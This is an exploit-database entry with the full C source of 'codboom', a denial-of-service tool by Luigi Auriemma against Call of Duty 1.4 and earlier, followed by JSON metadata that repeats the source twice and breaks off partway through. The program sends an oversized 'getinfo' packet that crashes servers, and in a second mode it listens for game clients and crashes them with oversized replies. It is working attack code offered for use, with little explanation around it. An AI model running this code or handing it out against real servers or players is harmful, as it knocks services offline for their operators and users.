ID 1337DAY-ID-5878 Type zdt Reporter Luigi Auriemma Modified 2004-09-05T00:00:00
Description
Exploit for unknown platform in category dos / poc
=============================================
Call of Duty <= 1.4 Denial of Service Exploit
=============================================
/* winerr.h */
/*
Header file used for manage errors in Windows
It support socket and errno too
(this header replace the previous sock_errX.h)
*/
#include <string.h>
#include <errno.h>
void std_err(void) {
char *error;
switch(WSAGetLastError()) {
case 10004: error = "Interrupted system call"; break;
case 10009: error = "Bad file number"; break;
case 10013: error = "Permission denied"; break;
case 10014: error = "Bad address"; break;
case 10022: error = "Invalid argument (not bind)"; break;
case 10024: error = "Too many open files"; break;
case 10035: error = "Operation would block"; break;
case 10036: error = "Operation now in progress"; break;
case 10037: error = "Operation already in progress"; break;
case 10038: error = "Socket operation on non-socket"; break;
case 10039: error = "Destination address required"; break;
case 10040: error = "Message too long"; break;
case 10041: error = "Protocol wrong type for socket"; break;
case 10042: error = "Bad protocol option"; break;
case 10043: error = "Protocol not supported"; break;
case 10044: error = "Socket type not supported"; break;
case 10045: error = "Operation not supported on socket"; break;
case 10046: error = "Protocol family not supported"; break;
case 10047: error = "Address family not supported by protocol family"; break;
case 10048: error = "Address already in use"; break;
case 10049: error = "Can't assign requested address"; break;
case 10050: error = "Network is down"; break;
case 10051: error = "Network is unreachable"; break;
case 10052: error = "Net dropped connection or reset"; break;
case 10053: error = "Software caused connection abort"; break;
case 10054: error = "Connection reset by peer"; break;
case 10055: error = "No buffer space available"; break;
case 10056: error = "Socket is already connected"; break;
case 10057: error = "Socket is not connected"; break;
case 10058: error = "Can't send after socket shutdown"; break;
case 10059: error = "Too many references, can't splice"; break;
case 10060: error = "Connection timed out"; break;
case 10061: error = "Connection refused"; break;
case 10062: error = "Too many levels of symbolic links"; break;
case 10063: error = "File name too long"; break;
case 10064: error = "Host is down"; break;
case 10065: error = "No Route to Host"; break;
case 10066: error = "Directory not empty"; break;
case 10067: error = "Too many processes"; break;
case 10068: error = "Too many users"; break;
case 10069: error = "Disc Quota Exceeded"; break;
case 10070: error = "Stale NFS file handle"; break;
case 10091: error = "Network SubSystem is unavailable"; break;
case 10092: error = "WINSOCK DLL Version out of range"; break;
case 10093: error = "Successful WSASTARTUP not yet performed"; break;
case 10071: error = "Too many levels of remote in path"; break;
case 11001: error = "Host not found"; break;
case 11002: error = "Non-Authoritative Host not found"; break;
case 11003: error = "Non-Recoverable errors: FORMERR, REFUSED, NOTIMP"; break;
case 11004: error = "Valid name, no data record of requested type"; break;
default: error = strerror(errno); break;
}
fprintf(stderr, "\nError: %s\n", error);
exit(1);
}
/* codboom.c */
/*
by Luigi Auriemma
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef WIN32
#include <winsock.h>
#include <io.h>
#include <malloc.h>
#include "winerr.h"
#define close closesocket
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netdb.h>
#endif
#define VER "0.1"
#define BUFFSZ 2048
#define PORT 28960
#define TIMEOUT 3
#define INFO "\xff\xff\xff\xff" "getinfo xxx\n"
#define BOOM "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
// must be major than 1023 bytes
#define SVBOF "\xff\xff\xff\xff" "getinfo %s\n"
#define CLBOF "\xff\xff\xff\xff" \
"%sResponse\n" \
"\\g_gametype\\dm" \
"\\gamename\\Call of Duty" \
"\\mapname\\mp_carentan" \
"\\protocol\\5" \
"\\scr_friendlyfire\\0" \
"\\scr_killcam\\0" \
"\\shortversion\\1.4" \
"\\sv_allowAnonymous\\0" \
"\\sv_floodProtect\\1" \
"\\sv_hostname\\Crash" \
"\\sv_maxclients\\26" \
"\\sv_maxPing\\0" \
"\\sv_maxRate\\10000" \
"\\sv_minPing\\0" \
"\\sv_privateClients\\0" \
"\\sv_punkbuster\\1" \
"\\sv_pure\\1" \
"\\pswrd\\0" \
"\\mod\\1" \
"\\crash\\%s"
void show_info(u_char *buff);
int timeout(int sock);
u_long resolv(char *host);
void std_err(void);
int main(int argc, char *argv[]) {
int sd,
len,
psz,
on = 1,
type;
u_short port = PORT;
u_char buff[BUFFSZ + 1];
struct sockaddr_in peer;
setbuf(stdout, NULL);
fputs("\n"
"Call of Duty <= 1.4 server/client shutdown "VER"\n"
"by Luigi Auriemma\n"
"e-mail: [email protected]\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);
if(argc < 2) {
printf("\nUsage: %s <attack> [port(%d)]\n"
"\n"
"Attack:\n"
" c = broadcast clients shutdown\n"
" s = server shutdown\n"
" You must add the IP or the hostname of the server after the 's'.\n"
"\n"
"Some usage examples:\n"
" codboom c listens on port %d for clients\n"
" codboom c 1234 listens on port 1234\n"
" codboom s 192.168.0.1 tests the server 192.168.0.1 on port %d\n"
" codboom s codserver 1234 tests the server codserver on port 1234\n"
"\n", argv[0], PORT, PORT, PORT);
exit(1);
}
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
type = argv[1][0];
if(type == 's') {
if(argc < 3) {
printf("\n"
"Error: you must specify the server IP or hostname.\n"
" Example: %s s localhost\n"
"\n", argv[0]);
exit(1);
}
peer.sin_addr.s_addr = resolv(argv[2]);
if(argc > 3) port = atoi(argv[3]);
printf("\n- Target %s:%hu\n",
inet_ntoa(peer.sin_addr),
port);
} else if(type == 'c') {
peer.sin_addr.s_addr = INADDR_ANY;
if(argc > 2) port = atoi(argv[2]);
printf("\n- Listen on port %d\n", port);
} else {
fputs("\n"
"Error: Wrong type of chosen attack.\n"
" You can choose between 2 types of attacks, passive versus clients with\n"
" 'c' or versus servers with 's'\n"
"\n", stdout);
exit(1);
}
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
psz = sizeof(peer);
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();
if(type == 's') {
fputs("- Request informations\n", stdout);
if(sendto(sd, INFO, sizeof(INFO) - 1, 0, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
if(timeout(sd) < 0) {
fputs("\n"
"Error: socket timeout, probably the server is not online or the port is wrong\n"
"\n", stdout);
exit(1);
}
len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL);
if(len < 0) std_err();
buff[len] = 0x00;
show_info(buff);
fputs("- Send BOOM packet\n", stdout);
len = sprintf(buff, SVBOF, BOOM);
if(sendto(sd, buff, len, 0, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
if(timeout(sd) < 0) {
fputs("\nServer IS vulnerable!!!\n\n", stdout);
} else {
len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL);
if(len < 0) std_err();
buff[len] = 0x00;
printf("\n"
"Server doesn't seem to be vulnerable, the following is the answer received:\n"
"\n%s\n\n", buff);
}
} else {
if(setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on))
< 0) std_err();
if(bind(sd, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
fputs(" Clients:\n", stdout);
for(;;) {
len = recvfrom(sd, buff, BUFFSZ, 0, (struct sockaddr *)&peer, &psz);
if(len < 0) std_err();
buff[len] = 0x00;
printf("%16s:%hu -> %s\n",
inet_ntoa(peer.sin_addr),
ntohs(peer.sin_port),
buff);
if(!memcmp(buff + 4, "getinfo", 7)) {
len = sprintf(buff, CLBOF, "info", BOOM);
} else {
len = sprintf(buff, CLBOF, "status", BOOM);
}
if(sendto(sd, buff, len, 0, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
}
}
close(sd);
return(0);
}
void show_info(u_char *buff) {
int nt = 1;
u_char *string;
while((string = strchr(buff, '\\'))) {
*string = 0x00;
if(!nt) {
printf("%30s: ", buff);
nt++;
} else {
printf("%s\n", buff);
nt = 0;
}
buff = string + 1;
}
printf("%s\n", buff);
}
int timeout(int sock) {
struct timeval tout;
fd_set fd_read;
int err;
tout.tv_sec = TIMEOUT;
tout.tv_usec = 0;
FD_ZERO(&fd_read);
FD_SET(sock, &fd_read);
err = select(sock + 1, &fd_read, NULL, NULL, &tout);
if(err < 0) std_err();
if(!err) return(-1);
return(0);
}
u_long resolv(char *host) {
struct hostent *hp;
u_long host_ip;
host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolv hostname (%s)\n", host);
exit(1);
} else host_ip = *(u_long *)(hp->h_addr);
}
return(host_ip);
}
#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif
# 0day.today [2018-04-04] #
{"published": "2004-09-05T00:00:00", "id": "1337DAY-ID-5878", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T02:14:26", "bulletin": {"published": "2004-09-05T00:00:00", "id": "1337DAY-ID-5878", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 6.5, "modified": "2016-04-20T02:14:26", "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P/"}}, "hash": "a1a0e209ab5cb76afc4e6cfa3a2dff1dba7dc7c7e95cf3476a792e3c18afd3cd", "description": "Exploit for unknown platform in category dos / poc", "type": "zdt", "lastseen": "2016-04-20T02:14:26", "edition": 1, "title": "Call of Duty <= 1.4 Denial of Service Exploit", "href": "http://0day.today/exploit/description/5878", "modified": "2004-09-05T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/5878", "references": [], "reporter": "Luigi Auriemma", "sourceData": "=============================================\r\nCall of Duty <= 1.4 Denial of Service Exploit\r\n=============================================\r\n\r\n\r\n/* winerr.h */\r\n\r\n/*\r\n Header file used for manage errors in Windows\r\n It support socket and errno too\r\n (this header replace the previous sock_errX.h)\r\n*/\r\n\r\n#include <string.h>\r\n#include <errno.h>\r\n\r\n\r\n\r\nvoid std_err(void) {\r\n char *error;\r\n\r\n switch(WSAGetLastError()) {\r\n case 10004: error = \"Interrupted system call\"; break;\r\n case 10009: error = \"Bad file number\"; break;\r\n case 10013: error = \"Permission denied\"; break;\r\n case 10014: error = \"Bad address\"; break;\r\n case 10022: error = \"Invalid argument (not bind)\"; break;\r\n case 10024: error = \"Too many open files\"; break;\r\n case 10035: error = \"Operation would block\"; break;\r\n case 10036: error = \"Operation now in progress\"; break;\r\n case 10037: error = \"Operation already in progress\"; break;\r\n case 10038: error = \"Socket operation on non-socket\"; break;\r\n case 10039: error = \"Destination address required\"; break;\r\n case 10040: error = \"Message too long\"; break;\r\n case 10041: error = \"Protocol wrong type for socket\"; break;\r\n case 10042: error = \"Bad protocol option\"; break;\r\n case 10043: error = \"Protocol not supported\"; break;\r\n case 10044: error = \"Socket type not supported\"; break;\r\n case 10045: error = \"Operation not supported on socket\"; break;\r\n case 10046: error = \"Protocol family not supported\"; break;\r\n case 10047: error = \"Address family not supported by protocol family\"; break;\r\n case 10048: error = \"Address already in use\"; break;\r\n case 10049: error = \"Can't assign requested address\"; break;\r\n case 10050: error = \"Network is down\"; break;\r\n case 10051: error = \"Network is unreachable\"; break;\r\n case 10052: error = \"Net dropped connection or reset\"; break;\r\n case 10053: error = \"Software caused connection abort\"; break;\r\n case 10054: error = \"Connection reset by peer\"; break;\r\n case 10055: error = \"No buffer space available\"; break;\r\n case 10056: error = \"Socket is already connected\"; break;\r\n case 10057: error = \"Socket is not connected\"; break;\r\n case 10058: error = \"Can't send after socket shutdown\"; break;\r\n case 10059: error = \"Too many references, can't splice\"; break;\r\n case 10060: error = \"Connection timed out\"; break;\r\n case 10061: error = \"Connection refused\"; break;\r\n case 10062: error = \"Too many levels of symbolic links\"; break;\r\n case 10063: error = \"File name too long\"; break;\r\n case 10064: error = \"Host is down\"; break;\r\n case 10065: error = \"No Route to Host\"; break;\r\n case 10066: error = \"Directory not empty\"; break;\r\n case 10067: error = \"Too many processes\"; break;\r\n case 10068: error = \"Too many users\"; break;\r\n case 10069: error = \"Disc Quota Exceeded\"; break;\r\n case 10070: error = \"Stale NFS file handle\"; break;\r\n case 10091: error = \"Network SubSystem is unavailable\"; break;\r\n case 10092: error = \"WINSOCK DLL Version out of range\"; break;\r\n case 10093: error = \"Successful WSASTARTUP not yet performed\"; break;\r\n case 10071: error = \"Too many levels of remote in path\"; break;\r\n case 11001: error = \"Host not found\"; break;\r\n case 11002: error = \"Non-Authoritative Host not found\"; break;\r\n case 11003: error = \"Non-Recoverable errors: FORMERR, REFUSED, NOTIMP\"; break;\r\n case 11004: error = \"Valid name, no data record of requested type\"; break;\r\n default: error = strerror(errno); break;\r\n }\r\n fprintf(stderr, \"\\nError: %s\\n\", error);\r\n exit(1);\r\n}\r\n\r\n/* codboom.c */\r\n\r\n/*\r\n\r\nby Luigi Auriemma\r\n\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n\r\n#ifdef WIN32\r\n #include <winsock.h>\r\n #include <io.h>\r\n #include <malloc.h>\r\n #include \"winerr.h\"\r\n\r\n #define close closesocket\r\n#else\r\n #include <unistd.h>\r\n #include <sys/socket.h>\r\n #include <sys/types.h>\r\n #include <arpa/inet.h>\r\n #include <netdb.h>\r\n#endif\r\n\r\n\r\n\r\n#define VER \"0.1\"\r\n#define BUFFSZ 2048\r\n#define PORT 28960\r\n#define TIMEOUT 3\r\n#define INFO \"\\xff\\xff\\xff\\xff\" \"getinfo xxx\\n\"\r\n#define BOOM \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\"\r\n // must be major than 1023 bytes\r\n#define SVBOF \"\\xff\\xff\\xff\\xff\" \"getinfo %s\\n\"\r\n#define CLBOF \"\\xff\\xff\\xff\\xff\" \\\r\n \"%sResponse\\n\" \\\r\n \"\\\\g_gametype\\\\dm\" \\\r\n \"\\\\gamename\\\\Call of Duty\" \\\r\n \"\\\\mapname\\\\mp_carentan\" \\\r\n \"\\\\protocol\\\\5\" \\\r\n \"\\\\scr_friendlyfire\\\\0\" \\\r\n \"\\\\scr_killcam\\\\0\" \\\r\n \"\\\\shortversion\\\\1.4\" \\\r\n \"\\\\sv_allowAnonymous\\\\0\" \\\r\n \"\\\\sv_floodProtect\\\\1\" \\\r\n \"\\\\sv_hostname\\\\Crash\" \\\r\n \"\\\\sv_maxclients\\\\26\" \\\r\n \"\\\\sv_maxPing\\\\0\" \\\r\n \"\\\\sv_maxRate\\\\10000\" \\\r\n \"\\\\sv_minPing\\\\0\" \\\r\n \"\\\\sv_privateClients\\\\0\" \\\r\n \"\\\\sv_punkbuster\\\\1\" \\\r\n \"\\\\sv_pure\\\\1\" \\\r\n \"\\\\pswrd\\\\0\" \\\r\n \"\\\\mod\\\\1\" \\\r\n \"\\\\crash\\\\%s\"\r\n\r\n\r\n\r\nvoid show_info(u_char *buff);\r\nint timeout(int sock);\r\nu_long resolv(char *host);\r\nvoid std_err(void);\r\n\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n int sd,\r\n len,\r\n psz,\r\n on = 1,\r\n type;\r\n u_short port = PORT;\r\n u_char buff[BUFFSZ + 1];\r\n struct sockaddr_in peer;\r\n\r\n\r\n setbuf(stdout, NULL);\r\n\r\n fputs(\"\\n\"\r\n \"Call of Duty <= 1.4 server/client shutdown \"VER\"\\n\"\r\n \"by Luigi Auriemma\\n\"\r\n \"e-mail: aluigi@altervista.org\\n\"\r\n \"web: http://aluigi.altervista.org\\n\"\r\n \"\\n\", stdout);\r\n\r\n if(argc < 2) {\r\n printf(\"\\nUsage: %s <attack> [port(%d)]\\n\"\r\n \"\\n\"\r\n \"Attack:\\n\"\r\n \" c = broadcast clients shutdown\\n\"\r\n \" s = server shutdown\\n\"\r\n \" You must add the IP or the hostname of the server after the 's'.\\n\"\r\n \"\\n\"\r\n \"Some usage examples:\\n\"\r\n \" codboom c listens on port %d for clients\\n\"\r\n \" codboom c 1234 listens on port 1234\\n\"\r\n \" codboom s 192.168.0.1 tests the server 192.168.0.1 on port %d\\n\"\r\n \" codboom s codserver 1234 tests the server codserver on port 1234\\n\"\r\n \"\\n\", argv[0], PORT, PORT, PORT);\r\n exit(1);\r\n }\r\n\r\n#ifdef WIN32\r\n WSADATA wsadata;\r\n WSAStartup(MAKEWORD(1,0), &wsadata);\r\n#endif \r\n\r\n type = argv[1][0];\r\n if(type == 's') {\r\n if(argc < 3) {\r\n printf(\"\\n\"\r\n \"Error: you must specify the server IP or hostname.\\n\"\r\n \" Example: %s s localhost\\n\"\r\n \"\\n\", argv[0]);\r\n exit(1);\r\n }\r\n peer.sin_addr.s_addr = resolv(argv[2]);\r\n if(argc > 3) port = atoi(argv[3]);\r\n printf(\"\\n- Target %s:%hu\\n\",\r\n inet_ntoa(peer.sin_addr),\r\n port);\r\n\r\n } else if(type == 'c') {\r\n peer.sin_addr.s_addr = INADDR_ANY;\r\n if(argc > 2) port = atoi(argv[2]);\r\n printf(\"\\n- Listen on port %d\\n\", port);\r\n\r\n } else {\r\n fputs(\"\\n\"\r\n \"Error: Wrong type of chosen attack.\\n\"\r\n \" You can choose between 2 types of attacks, passive versus clients with\\n\"\r\n \" 'c' or versus servers with 's'\\n\"\r\n \"\\n\", stdout);\r\n exit(1);\r\n }\r\n\r\n peer.sin_port = htons(port);\r\n peer.sin_family = AF_INET;\r\n psz = sizeof(peer);\r\n\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd < 0) std_err();\r\n\r\n if(type == 's') {\r\n fputs(\"- Request informations\\n\", stdout);\r\n if(sendto(sd, INFO, sizeof(INFO) - 1, 0, (struct sockaddr *)&peer, sizeof(peer))\r\n < 0) std_err();\r\n if(timeout(sd) < 0) {\r\n fputs(\"\\n\"\r\n \"Error: socket timeout, probably the server is not online or the port is wrong\\n\"\r\n \"\\n\", stdout);\r\n exit(1);\r\n }\r\n len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL);\r\n if(len < 0) std_err();\r\n buff[len] = 0x00;\r\n show_info(buff);\r\n\r\n fputs(\"- Send BOOM packet\\n\", stdout);\r\n len = sprintf(buff, SVBOF, BOOM);\r\n if(sendto(sd, buff, len, 0, (struct sockaddr *)&peer, sizeof(peer))\r\n < 0) std_err();\r\n\r\n if(timeout(sd) < 0) {\r\n fputs(\"\\nServer IS vulnerable!!!\\n\\n\", stdout);\r\n } else {\r\n len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL);\r\n if(len < 0) std_err();\r\n buff[len] = 0x00;\r\n printf(\"\\n\"\r\n \"Server doesn't seem to be vulnerable, the following is the answer received:\\n\"\r\n \"\\n%s\\n\\n\", buff);\r\n }\r\n } else {\r\n if(setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on))\r\n < 0) std_err();\r\n if(bind(sd, (struct sockaddr *)&peer, sizeof(peer))\r\n < 0) std_err();\r\n fputs(\" Clients:\\n\", stdout);\r\n for(;;) {\r\n len = recvfrom(sd, buff, BUFFSZ, 0, (struct sockaddr *)&peer, &psz);\r\n if(len < 0) std_err();\r\n buff[len] = 0x00;\r\n\r\n printf(\"%16s:%hu -> %s\\n\",\r\n inet_ntoa(peer.sin_addr),\r\n ntohs(peer.sin_port),\r\n buff);\r\n\r\n if(!memcmp(buff + 4, \"getinfo\", 7)) {\r\n len = sprintf(buff, CLBOF, \"info\", BOOM);\r\n } else {\r\n len = sprintf(buff, CLBOF, \"status\", BOOM);\r\n }\r\n if(sendto(sd, buff, len, 0, (struct sockaddr *)&peer, sizeof(peer))\r\n < 0) std_err();\r\n }\r\n }\r\n\r\n close(sd);\r\n return(0);\r\n}\r\n\r\n\r\n\r\n\r\n\r\nvoid show_info(u_char *buff) {\r\n int nt = 1;\r\n u_char *string;\r\n\r\n while((string = strchr(buff, '\\\\'))) {\r\n *string = 0x00;\r\n if(!nt) {\r\n printf(\"%30s: \", buff);\r\n nt++;\r\n } else {\r\n printf(\"%s\\n\", buff);\r\n nt = 0;\r\n }\r\n buff = string + 1;\r\n }\r\n printf(\"%s\\n\", buff);\r\n}\r\n\r\n\r\n\r\n\r\nint timeout(int sock) {\r\n struct timeval tout;\r\n fd_set fd_read;\r\n int err;\r\n\r\n tout.tv_sec = TIMEOUT;\r\n tout.tv_usec = 0;\r\n FD_ZERO(&fd_read);\r\n FD_SET(sock, &fd_read);\r\n err = select(sock + 1, &fd_read, NULL, NULL, &tout);\r\n if(err < 0) std_err();\r\n if(!err) return(-1);\r\n return(0);\r\n}\r\n\r\n\r\n\r\n\r\nu_long resolv(char *host) {\r\n struct hostent *hp;\r\n u_long host_ip;\r\n\r\n host_ip = inet_addr(host);\r\n if(host_ip == INADDR_NONE) {\r\n hp = gethostbyname(host);\r\n if(!hp) {\r\n printf(\"\\nError: Unable to resolv hostname (%s)\\n\", host);\r\n exit(1);\r\n } else host_ip = *(u_long *)(hp->h_addr);\r\n }\r\n return(host_ip);\r\n}\r\n\r\n\r\n\r\n#ifndef WIN32\r\n void std_err(void) {\r\n perror(\"\\nError\");\r\n exit(1);\r\n }\r\n#endif\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "50149f6fc55c0ce9a36b21450f566a6d", "key": "href"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "a997313577ce64f57e6c6891c2c95450", "key": "sourceHref"}, {"hash": "396ff4f9c9e83963eb0a6caff50a290f", "key": "sourceData"}, {"hash": "5a856d8508314549fc011ddb2462253e", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "939ad61322c6011a78b807d828c2caef", "key": "description"}, {"hash": "619318fadde833ee77a53ae1fee56d32", "key": "published"}, {"hash": "888babac088d40ba4e1d76e7b342e511", "key": "title"}, {"hash": "619318fadde833ee77a53ae1fee56d32", "key": "modified"}], "objectVersion": "1.0"}}], "description": "Exploit for unknown platform in category dos / poc", "hash": "867712d10f803971bb0df2d890f991eda71242aa898886e93531952350ae1320", "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-19942"]}, {"type": "exploitdb", "idList": ["EDB-ID:38114"]}], "modified": "2018-04-04T17:34:04"}, "vulnersScore": 5.0}, "type": "zdt", "lastseen": "2018-04-04T17:34:04", "edition": 2, "title": "Call of Duty <= 1.4 Denial of Service Exploit", "href": "https://0day.today/exploit/description/5878", "modified": "2004-09-05T00:00:00", "bulletinFamily": "exploit", "viewCount": 3, "cvelist": [], "sourceHref": "https://0day.today/exploit/5878", "references": [], "reporter": "Luigi Auriemma", "sourceData": "=============================================\r\nCall of Duty <= 1.4 Denial of Service Exploit\r\n=============================================\r\n\r\n\r\n/* winerr.h */\r\n\r\n/*\r\n Header file used for manage errors in Windows\r\n It support socket and errno too\r\n (this header replace the previous sock_errX.h)\r\n*/\r\n\r\n#include <string.h>\r\n#include <errno.h>\r\n\r\n\r\n\r\nvoid std_err(void) {\r\n char *error;\r\n\r\n switch(WSAGetLastError()) {\r\n case 10004: error = \"Interrupted system call\"; break;\r\n case 10009: error = \"Bad file number\"; break;\r\n case 10013: error = \"Permission denied\"; break;\r\n case 10014: error = \"Bad address\"; break;\r\n case 10022: error = \"Invalid argument (not bind)\"; break;\r\n case 10024: error = \"Too many open files\"; break;\r\n case 10035: error = \"Operation would block\"; break;\r\n case 10036: error = \"Operation now in progress\"; break;\r\n case 10037: error = \"Operation already in progress\"; break;\r\n case 10038: error = \"Socket operation on non-socket\"; break;\r\n case 10039: error = \"Destination address required\"; break;\r\n case 10040: error = \"Message too long\"; break;\r\n case 10041: error = \"Protocol wrong type for socket\"; break;\r\n case 10042: error = \"Bad protocol option\"; break;\r\n case 10043: error = \"Protocol not supported\"; break;\r\n case 10044: error = \"Socket type not supported\"; break;\r\n case 10045: error = \"Operation not supported on socket\"; break;\r\n case 10046: error = \"Protocol family not supported\"; break;\r\n case 10047: error = \"Address family not supported by protocol family\"; break;\r\n case 10048: error = \"Address already in use\"; break;\r\n case 10049: error = \"Can't assign requested address\"; break;\r\n case 10050: error = \"Network is down\"; break;\r\n case 10051: error = \"Network is unreachable\"; break;\r\n case 10052: error = \"Net dropped connection or reset\"; break;\r\n case 10053: error = \"Software caused connection abort\"; break;\r\n case 10054: error = \"Connection reset by peer\"; break;\r\n case 10055: error = \"No buffer space available\"; break;\r\n case 10056: error = \"Socket is already connected\"; break;\r\n case 10057: error = \"Socket is not connected\"; break;\r\n case 10058: error = \"Can't send after socket shutdown\"; break;\r\n case 10059: error = \"Too many references, can't splice\"; break;\r\n case 10060: error = \"Connection timed out\"; break;\r\n case 10061: error = \"Connection refused\"; break;\r\n case 10062: error = \"Too many levels of symbolic links\"; break;\r\n case 10063: error = \"File name too long\"; break;\r\n case 10064: error = \"Host is down\"; break;\r\n case 10065: error = \"No Route to Host\"; break;\r\n case 10066: error = \"Directory not empty\"; break;\r\n case 10067: error = \"Too many processes\"; break;\r\n case 10068: error = \"Too many users\"; break;\r\n case 10069: error = \"Disc Quota Exceeded\"; break;\r\n case 10070: error = \"Stale NFS file handle\"; break;\r\n case 10091: error = \"Network SubSystem is 